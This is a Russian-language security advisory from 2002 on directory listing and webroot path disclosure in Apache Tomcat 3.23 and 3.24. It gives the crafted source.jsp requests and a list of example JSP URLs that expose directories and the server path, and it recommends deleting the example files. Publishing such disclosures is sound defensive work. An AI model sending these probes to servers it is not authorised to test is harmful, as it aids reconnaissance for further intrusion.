Раскрытие содержания директорий и реального пути в Apache Tomcat

Дата публикации:
31.05.2002
Всего просмотров:
1868
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Apache Tomcat – бесплатный, с открытым исходным кодом Java сервер. Обнаруженные уязвимости позволяют просматривать содержания директорий и раскрывать физический путь к корневой директории Web сервера.

1. Обычно source.jsp используется для просмотра исходного текста программ в каталоге примеров. Запрос http://webserver:80/examples/jsp/source.jsp?? Позволяет просматривать содержимое директории.

Запрос http://webserver:80/examples/jsp/source.jsp?/jsp/ содержание поддиректорий.

2. Следующие запросы покажут реальный путь к wwwroot:

http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp

Полученная информация может использоваться для организации дальнейших нападений. Для устранения уязвимости удалите все файлы примеров.

Уязвимость обнаружена в Apache Tomcat Java server versions 3.23 и 3.24

Ссылки: Tomcat Multiple Directory Listing and Webroot Location Vulnerabilities

или введите имя

CAPTCHA